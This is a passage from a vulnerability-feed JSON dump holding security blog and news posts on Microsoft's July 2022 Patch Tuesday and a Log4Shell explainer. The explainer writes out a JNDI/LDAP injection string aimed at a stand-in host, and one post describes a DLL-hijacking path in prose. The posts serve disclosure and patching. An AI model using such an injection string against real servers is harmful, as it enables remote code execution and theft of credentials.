"LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-13T01:02:49", "type": "krebs", "title": "Microsoft Patch Tuesday, July 2022 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22022", "CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22041", "CVE-2022-22047", "CVE-2022-30206", "CVE-2022-30221", "CVE-2022-30226"], "modified": "2022-07-13T01:02:49", "id": "KREBS:4D5B2D5FA1A6E077B46D7F3051319E72", "href": "https://krebsonsecurity.com/2022/07/microsoft-patch-tuesday-july-2022-edition/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2022-08-14T11:59:47", "description": "Hello everyone! Microsoft has been acting weird lately. I mean the recent [publication of a propaganda report](<https://t.me/avleonovcom/1021>) about evil Russians and how Microsoft is involved in the conflict between countries. It wouldn't be unusual for a US government agency, NSA or CIA to publish such a report. But when a global IT vendor, which, in theory, should be more or less neutral, does this\u2026 This is a clear signal. It's not about business anymore. \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239096>\n\nI'll take a closer look at this report in the next episode of the Vulnerability Management news, but for now let's take a look at Microsoft July Patch Tuesday. Yes, the vendor is behaving strangely, but Microsoft products need to be patched. Right? At least for now. And tracking vulnerabilities is always a good thing. ![\ud83d\ude42](https://s.w.org/images/core/emoji/14.0.0/72x72/1f642.png)\n\nOn July Patch Tuesday, July 12, 84 vulnerabilities were released. Between June and July Patch Tuesdays, 15 vulnerabilities were released. This gives us 99 vulnerabilities in the report. \n \n \n $ cat comments_links.txt \n Qualys|July 2022 Patch Tuesday. Microsoft Releases 84 Vulnerabilities with 4 Critical, plus 2 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 27 Vulnerabilities with 18 Critical.|https://blog.qualys.com/vulnerabilities-threat-research/2022/07/12/july-2022-patch-tuesday\n ZDI|The July 2022 Security Update Review|https://www.zerodayinitiative.com/blog/2022/7/12/the-july-2022-security-update-review\n \n $ python3.8 vulristics.py --report-type \"ms_patch_tuesday_extended\" --mspt-year 2022 --mspt-month \"July\" --mspt-comments-links-path \"comments_links.txt\" --rewrite-flag \"True\"\n ...\n Creating Patch Tuesday profile...\n MS PT Year: 2022\n MS PT Month: July\n MS PT Date: 2022-07-12\n MS PT CVEs found: 84\n Ext MS PT Date from: 2022-06-15\n Ext MS PT Date to: 2022-07-11\n Ext MS PT CVEs found: 15\n ALL MS PT CVEs: 99\n ...\n\n * Urgent: 0\n * Critical: 1\n * High: 19\n * Medium: 78\n * Low: 1\n\nInterestingly, in this Patch Tuesday, more than half of all vulnerabilities are EoP.\n\n## CSRSS EoP\n\nWhat can I say, prioritization in [Vulristics](<https://github.com/leonov-av/vulristics>) works correctly. At the top of the July Patch Tuesday list is one critical and actively exploited **Elevation of Privilege** in Windows CSRSS (CVE-2022-22047). This vulnerability has been widely reported in the media.\n\nClient Server Runtime Subsystem, or csrss.exe, is a component of the Windows NT family of operating systems that provides the user mode side of the Win32 subsystem and is included in Windows NT 3.1 and later. Because most of the Win32 subsystem operations have been moved to kernel mode drivers in Windows NT 4 and later, CSRSS is mainly responsible for Win32 console handling and GUI shutdown.\n\nCSRSS runs as a user-mode system service. When a user-mode process calls a function involving console windows, process/thread creation, or side-by-side support, instead of issuing a system call, the Win32 libraries (kernel32.dll, user32.dll, gdi32.dll) send an inter-process call to the CSRSS process which does most of the actual work without compromising the kernel.\n\nThis Elevation of Privilege vulnerability in CSRSS allows an attacker to execute code as SYSTEM, provided they can execute other code on the target. Bugs of this type are typically paired with a code execution bug, usually a specially crafted Office or Adobe document, to take over a system. These attacks often rely on macros, which is why so many were disheartened to hear Microsoft\u2019s delay in blocking all Office macros by default.\n\nMicrosoft says this vulnerability has been exploited in the wild, though no further details have been shared. There is no public exploit yet. Two similar vulnerabilities in CSRSS (CVE-2022-22049 and CVE-2022-22026) were also fixed, likely as a result of Microsoft\u2019s investigation into the in-the-wild exploitation of CVE-2022-22047.\n\n## RPC RCE\n\n**Remote Code Execution** in Remote Procedure Call Runtime (CVE-2022-22038). Here Microsoft has a POC exploit. This July Patch Tuesday bug could allow a remote, unauthenticated attacker to exploit code on an affected system. While not specified in the bulletin, the presumption is that the code execution would occur at elevated privileges. Combine these attributes and you end up with a potentially wormable bug. Microsoft states the attack complexity is high. Additional actions by an attacker are required in order to prepare a target for successful exploitation and an attacker would need to make \u201crepeated exploitation attempts\u201d to take advantage of this bug, but unless you are actively blocking RPC activity, you may not see these attempts.\n\n## Microsoft Edge Memory Corruption\n\nBetween June and July Patch Tuesday, **Memory Corruption** in Microsoft Edge (CVE-2022-2294) was released. Heap buffer overflow in WebRTC, to be precise. WebRTC (Web Real-Time Communication) is a free and open-source project providing web browsers and mobile applications with real-time communication (RTC) via application programming interfaces (APIs). It allows audio and video communication to work inside web pages by allowing direct peer-to-peer communication, eliminating the need to install plugins or download native apps. So, the vulnerability is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. Google is aware that an exploit for this vulnerability exists in the wild. If you\u2019re using Microsoft Edge (Chromium-based), make sure it gets updated as soon as possible.\n\n## Azure Site Recovery RCEs and EOPs\n\nThere are also a lot of vulnerabilities in Azure Site Recovery in July Patch Tuesday. Both EoPs and RCEs, and quite a few with non-public exploits of the POC maturity level. According to the description "Site Recovery is a native disaster recovery as a service (DRaaS)", it would seem that this should be patched by Microsoft themselves. But in fact, there is a Microsoft Azure Site Recovery suite installed on the hosts, and at least some of the vulnerabilities were found in it. \n\nLet's see, for example, **Elevation of Privilege** in Azure Site Recovery (CVE-2022-33675). The vulnerability was discovered and [reported to Microsoft by Tenable researcher Jimi Sebree](<https://www.tenable.com/security/research/tra-2022-26>). The Microsoft Azure Site Recovery suite contains a DLL hijacking flaw that allows for privilege escalation from any low privileged user to SYSTEM. \n\nIncorrect permissions on the service\u2019s executable directory (E:\\Program Files (x86)\\Microsoft Azure Site Recovery\\home\\svsystems\\transport\\\\) allow new files to be created by any user. The service launched from this directory runs automatically and with SYSTEM privileges and attempts to load several DLLs from this directory. This allows for a DLL hijacking/planting attack via several libraries that are attempted to be loaded from this location when the service is launched. Existing deployments should ensure that the Microsoft-supplied patches have been appropriately applied.\n\nThe full Vulristics report is available here: [ms_patch_tuesday_july2022_report](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_july2022_report_with_comments_ext_img.html>)", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-23T08:34:29", "type": "avleonov", "title": "Microsoft Patch Tuesday July 2022: propaganda report, CSRSS EoP, RPC RCE, Edge, Azure Site Recovery", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22026", "CVE-2022-22038", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-2294", "CVE-2022-33675"], "modified": "2022-07-23T08:34:29", "id": "AVLEONOV:B87691B304EF70215B926F66B871260A", "href": "https://avleonov.com/2022/07/23/microsoft-patch-tuesday-july-2022-propaganda-report-csrss-eop-rpc-rce-edge-azure-site-recovery/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-26T22:37:17", "description": "Hello everyone! I decided to make a separate episode about Log4Shell. Of course, there have already been many reviews of this vulnerability. But I do it primarily for myself. It seems to me that serious problems with Log4j and similar libraries will be with us for a long time. Therefore, it would be interesting to document how it all began. So what is the root cause of Log4Shell?\n\n## Logs\n\nGenerally speaking, the IT infrastructure of any company deals with streams of input data. From user requests to a corporate website to integration with banking APIs and cloud services. A lot of data gets into the infrastructure of the company, is transferred from system to system, periodically getting into the logs. These logs are required to verify that the systems are functioning correctly.\n\n## True programmers\n\nIt would be ok if these log files were just written by some basic functions. But the true programmers cannot do this. They have a fancy library for every need. Even if it's as simple as writing text logs. Unfortunately, these libraries are also written by true programmers. And they might decide that it would be very cool to make possible automatic replacements in the logs. As the authors of the java library log4j did.\n\nIn the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form `${prefix:name}`. For example, `Text: ${java:version}` might be converted to `Text: Java version 1.7.0_67`.\n\nSo far it looks pretty harmless. The question is, what other replacements are supported? And they support the replacemement :\n\n`${jndi:<lookup>}`\n\n## JNDI\n\nThe Java Naming and Directory Interface (JNDI) is a Java API for a directory service that allows Java software clients to discover and look up data and resources (in the form of Java objects) via a name.\n\nIf log4j sees JNDI in the logs, it makes a request to an external resource. These requests can be different. The JDK includes service providers for the following naming/directory services:\n\n * Lightweight Directory Access Protocol (LDAP)\n * Common Object Request Broker Architecture (CORBA) Common Object Services (COS) name service\n * Java Remote Method Invocation (RMI) Registry\n * Domain Name Service (DNS)\n\nTherefore, it is likely that we will see different variations of the attack. But now the most common attack scenario is using LDAP.\n\n`${jndi:ldap://example.com/file}`\n\n## LDAP\n\nThe Lightweight Directory Access Protocol is an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol (IP) network. A client starts an LDAP session by connecting to an LDAP server, by default on TCP and UDP port 389, or on port 636 for LDAPS (LDAP over TLS/SSL).\n\nThe client may request various operations. Search, add a new entry, delete an entry, modify an entry and so on. An LDAP URL describes an LDAP search operation that is used to retrieve information from an LDAP directory. LDAP URLs have the following syntax:\n\n`ldap[s]://hostname:port/base_dn?attributes?scope?filter`\n\n![](https://avleonov.com/wp-content/uploads/2021/12/08_scheme.svg_-1024x576.png)\n\nIn response to such a search request, the malicious LDAP server will return a payload, which will work on the host and may lead to RCE. Well, if this does not work, an attacker can simply make requests containig environment variables from the host, that may contain passwords and tokens. it's not bad too.\n\n## And what to do with it?\n\nIt seems every security vendor has already written marketing posts on how exactly their solution can solve this problem.\n\n * Vulnerability and patch management systems can simplify the inventory and remediation of vulnerable components or software.\n * Filtering systems (Firewalls, NGFW, WAF) can catch malicious requests that can get into the logs, for example, from the user agent and http request parameters. They can also help to control that there are no external ldap connections.\n\nIt seems that of course none of these solutions is a panacea. It is necessary to work with this problem systematically.\n\n## In conclusion\n\nProblems with Log4j will be with us for a long time. Just look at the [lists of vulnerable third-party programs](<https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md>). Not to mention the programs developed in-house. And this is only if we are talking about one vulnerability Log4Shell (CVE-2021-44228). Now there are at least 2 more of them in log4j: incomplete fix of Log4Shell RCE CVE-2021-45046 and DOS CVE-2021-45105. And there will certainly be more of them, as more researchers will pay attention to this vector. As it was with SMB, OpenSSL, Print Spooler and so on.\n\nBut in a global sense, I see some positive aspects in this as well. Such critical cases is a good opportunity to draw the attention of C-level management to security problems. Starting, for example, with an IT-inventory and the control over the software development process. On such issues, it becomes clear why all this is needed and why it is practically impossible to solve such critical tasks on time without well-functioning processes. It is also a good way to check if network filtering is working in blocking mode and if outbound connections from internal hosts are being monitored.\n\nIt would also be great if the developers paid attention to such cases and remembered the KISS "Keep it simple, stupid" principle. Adding external call capability to the log library is a bad idea. I even think it's a bad idea to use such a library for logging when you don't need it. However, when looking at these things realistically, I don't think this will happen. True programmers will continue to write strange things. This means that security specialists will always have a job. And that's also good news.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-26T22:07:17", "type": "avleonov", "title": "Log4j \u201cLog4Shell\u201d RCE explained (CVE-2021-44228)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-26T22:07:17", "id": "AVLEONOV:469525DB37AAC7A2242EE80C1BCBC8DB", "href": "https://avleonov.com/2021/12/27/log4j-log4shell-rce-explained-cve-2021-44228/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-07-16T16:17:19", "description": "It\u2019s time to triage a lot of [patching](<https://www.malwarebytes.com/business/vulnerability-patch-management>) again. Microsoft\u2019s July Patch Tuesday includes an actively exploited local privilege escalation vulnerability in the Windows Client/Server Runtime Subsystem (CSRSS). This vulnerability immediately made it to the Cybersecurity & Infrastructure Security Agency (CISA) list of [known to be exploited in the wild list](<https://blog.malwarebytes.com/reports/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities/>) that are due for patching by August 2, 2022.\n\n## Microsoft\n\nIn total the Microsoft updates include fixes for 84 vulnerabilities. Four of these vulnerabilities are labelled as \u201cCritical\u201d since they are remote code execution (RCE) vulnerabilities.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that ware assigned to the four Critical vulnerabilities:\n\n[CVE-2022-22029](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22029>): Windows Network File System (NFS) RCE vulnerability. This vulnerability is not exploitable in NFSV4.1. Prior to updating your version of Windows that protects against this vulnerability, you can mitigate an attack by disabling NFSV3, but this may adversely affect your ecosystem and should only be used as a temporary mitigation.\n\n[CVE-2022-22039](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22039>): Another Windows Network File System (NFS) RCE vulnerability. It's possible to exploit this vulnerability over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger an RCE.\n\n[CVE-2022-22038](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22038>): Remote Procedure Call Runtime RCE vulnerability. Successful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[CVE-2022-30221](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30221>): Windows Graphics Component RCE vulnerability. An attacker would have to convince a targeted user to connect to a malicious RDP server. On connecting, the malicious server could execute code on the victim's system in the context of the targeted user.\n\n## Azure Site Recovery\n\nA huge part of the patches consist of 32 vulnerabilities in the Azure Site Recovery suite that could have allowed attackers to gain elevated privileges or perform remote code execution. [Azure Site Recovery](<https://docs.microsoft.com/en-us/azure/site-recovery/>) is an integrated disaster recovery service for Azure that helps ensure business continuity by keeping business apps and workloads running during outages.\n\nAccording to Microsoft, [SQL injection](<https://www.malwarebytes.com/glossary/sql-injection>) vulnerabilities caused most of the privilege escalation bugs in Azure Site Recovery.\n\n## CVE-2022-22047\n\nThe vulnerability that is known to be exploited in the wild is an elevation of privilege (EoP) vulnerability. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.\n\nThis type of vulnerability usually comes into play once an attacker has gained an initial foothold. They can then use this vulnerability to gain more permissions and expand their access to the compromised system.\n\nThe vulnerability is described as a Windows CSRSS Elevation of Privilege vulnerability. CSRSS is the Windows component that provides the user mode side of the Win32 subsystem. CSRSS is critical for a system\u2019s operation and is mainly responsible for Win32 console handling and GUI shutdown.\n\nThis type of vulnerability are often chained together with others in macros, which makes the decision to [roll back Office Macro blocking](<https://blog.malwarebytes.com/business/2022/07/microsoft-appears-to-be-rolling-back-office-macro-blocking/>) incomprehensible, even if it is only temporary.\n\n## Other vendors\n\nOther vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.\n\nAdobe released [security updates](<https://helpx.adobe.com/security.html>) for Acrobat, Character Animator, Photoshop, Reader, and RoboHelp.\n\nCisco released critical updates for Cisco Expressway Series, Cisco TelePresence Video Communication Server, Cisco Email Security Appliance, Cisco Secure Email and Web Manager, Cisco Small Business RV110W, RV130, RV130W, and RV215W routers, and [several other security updates](<https://tools.cisco.com/security/center/publicationListing.x>).\n\nCitrix released [hotfixes](<https://support.citrix.com/article/CTX461397/citrix-hypervisor-security-bulletin-for-cve202223816-and-cve202223825>) to address a problem that may affect Citrix Hypervisor and Citrix XenServer under some circumstances.\n\nGoogle released [Android's July security updates](<https://source.android.com/security/bulletin/2022-07-01>) including 3 labelled as \u201cCritical\u201d.\n\nSAP released its [July 2022 Patch Day bulletin](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>) with 20 new Security Notes.\n\nVMWare released [security updates](<https://www.vmware.com/security/advisories.html>).\n\nStay safe, everyone!\n\nThe post [Update now\u2014July Patch Tuesday patches include fix for exploited zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/07/update-now-july-patch-tuesday-patches-include-fix-for-exploited-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-13T12:21:53", "type": "malwarebytes", "title": "Update now\u2014July Patch Tuesday patches include fix for exploited zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-30221"], "modified": "2022-07-13T12:21:53", "id": "MALWAREBYTES:90BD6A9BB937B6617FDC4FE73A86B38A", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/07/update-now-july-patch-tuesday-patches-include-fix-for-exploited-zero-day/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-07-13T05:57:21", "description": "[![Microsoft](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhMMVV60incjQemAA8K9lAWSescsqjqG2a3UdVc4GiCMmXBd6175xW7cZiTJONSGUB1N9s-MMZARqaZP7h-OdKy4jUdvvT_H-aPCCLF9TKLu1S1Xcj8NZh673Hir7VOwNMNdOLjEU6LSXewzYkJXyX0Y0dpIn7L1WK7IuD61f1iG8uajyHoBwST8KVh/s728-e1000/windows-update.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhMMVV60incjQemAA8K9lAWSescsqjqG2a3UdVc4GiCMmXBd6175xW7cZiTJONSGUB1N9s-MMZARqaZP7h-OdKy4jUdvvT_H-aPCCLF9TKLu1S1Xcj8NZh673Hir7VOwNMNdOLjEU6LSXewzYkJXyX0Y0dpIn7L1WK7IuD61f1iG8uajyHoBwST8KVh/s728-e100/windows-update.jpg>)\n\nMicrosoft released its monthly round of Patch Tuesday updates to address [84 new security flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jul>) spanning multiple product categories, counting a zero-day vulnerability that's under active attack in the wild.\n\nOf the 84 shortcomings, four are rated Critical, and 80 are rated Important in severity. Also separately resolved by the tech giant are [two other bugs](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in the Chromium-based Edge browser, one of which plugs another [zero-day flaw](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>) that Google disclosed as being actively exploited in real-world attacks.\n\nTop of the list of this month's updates is [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>) (CVSS score: 7.8), a case of privilege escalation in the Windows Client Server Runtime Subsystem ([CSRSS](<https://en.wikipedia.org/wiki/Client/Server_Runtime_Subsystem>)) that could be abused by an attacker to gain SYSTEM permissions.\n\n\"With this level of access, the attackers are able to disable local services such as Endpoint Detection and Security tools,\" Kev Breen, director of cyber threat research at Immersive Labs, told The Hacker News. \"With SYSTEM access they can also deploy tools like Mimikatz which can be used to recover even more admin and domain level accounts, spreading the threat quickly.\"\n\nVery little is known about the nature and scale of the attacks other than an \"Exploitation Detected\" assessment from Microsoft. The company's Threat Intelligence Center (MSTIC) and Security Response Center (MSRC) have been credited with reporting the flaw.\n\nBesides CVE-2022-22047, two more elevation of privilege flaws have been fixed in the same component \u2014 [CVE-2022-22026](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22026>) (CVSS score: 8.8) and [CVE-2022-22049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22049>) (CVSS score: 7.8) \u2014 that were reported by Google Project Zero researcher Sergei Glazunov.\n\n\"A locally authenticated attacker could send specially crafted data to the local CSRSS service to elevate their privileges from [AppContainer](<https://docs.microsoft.com/windows/win32/secauthz/appcontainer-isolation>) to SYSTEM,\" Microsoft said in an advisory for CVE-2022-22026.\n\n\"Because the AppContainer environment is considered a defensible security boundary, any process that is able to bypass the boundary is considered a change in Scope. The attacker could then execute code or access resources at a higher integrity level than that of the AppContainer execution environment.\"\n\nAlso remediated by Microsoft include a number of remote code execution bugs in Windows Network File System ([CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) and [CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>)), Windows Graphics ([CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>)), Remote Procedure Call Runtime ([CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>)), and Windows Shell ([CVE-2022-30222](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30222>)).\n\nThe update further stands out for patching as many as 32 issues in the [Azure Site Recovery](<https://docs.microsoft.com/en-us/azure/site-recovery/site-recovery-overview>) business continuity service. Two of these flaws are related to remote code execution and the remaining 30 concern privilege escalation.\n\n\"Successful exploitation [...] requires an attacker to compromise admin credentials to one of the VMs associated with the configuration server,\" the company said, adding the flaws do not \"allow disclosure of any confidential information, but could allow an attacker to modify data that could result in the service being unavailable.\"\n\nOn top of that, Microsoft's July update also contains fixes for four privilege escalation vulnerabilities in the Windows Print Spooler module ([CVE-2022-22022](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22022>), [CVE-2022-22041](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22041>), [CVE-2022-30206](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30206>), and [CVE-2022-30226](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30226>)) after a [brief respite in June 2022](<https://thehackernews.com/2022/06/patch-tuesday-microsoft-issues-fix-for.html>), underscoring what appears to be a never-ending stream of flaws plaguing the technology.\n\nRounding off the Patch Tuesday updates are two notable fixes for tampering vulnerabilities in the Windows Server Service ([CVE-2022-30216](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30216>)) and Microsoft Defender for Endpoint ([CVE-2022-33637](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33637>)) and three denial-of-service (DoS) flaws in Internet Information Services ([CVE-2022-22025](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22025>) and [CVE-2022-22040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22040>)) and Security Account Manager ([CVE-2022-30208](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30208>)).\n\n### Software Patches from Other Vendors\n\nIn addition to Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [AMD](<https://www.amd.com/en/corporate/product-security>)\n * [Android](<https://source.android.com/security/bulletin/2022-07-01>)\n * [Apache Projects](<https://blogs.apache.org/foundation/date/20220712>)\n * [Cisco](<https://thehackernews.com/2022/07/cisco-and-fortinet-release-security.html>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Fortinet](<https://thehackernews.com/2022/07/cisco-and-fortinet-release-security.html>)\n * [GitLab](<https://about.gitlab.com/releases/2022/07/04/gitlab-15-1-2-released/>)\n * [Google Chrome](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>)\n * [HP](<https://support.hp.com/us-en/security-bulletins>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * [Lenovo](<https://support.lenovo.com/us/en/product_security/ps500001-lenovo-product-security-advisories>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/July-2022>)\n * [Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/july-2022-bulletin.html>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-13T04:15:00", "type": "thn", "title": "Microsoft Releases Fix for Zero-Day Flaw in July 2022 Security Patch Rollout", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-22022", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30216", "CVE-2022-30221", "CVE-2022-30222", "CVE-2022-30226", "CVE-2022-33637"], "modified": "2022-07-13T05:36:49", "id": "THN:8C2FBC83F6EC62900F1887F00903447F", "href": "https://thehackernews.com/2022/07/microsoft-releases-fix-for-zero-day.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-09T12:37:45", "description": "[![Apache Log4j 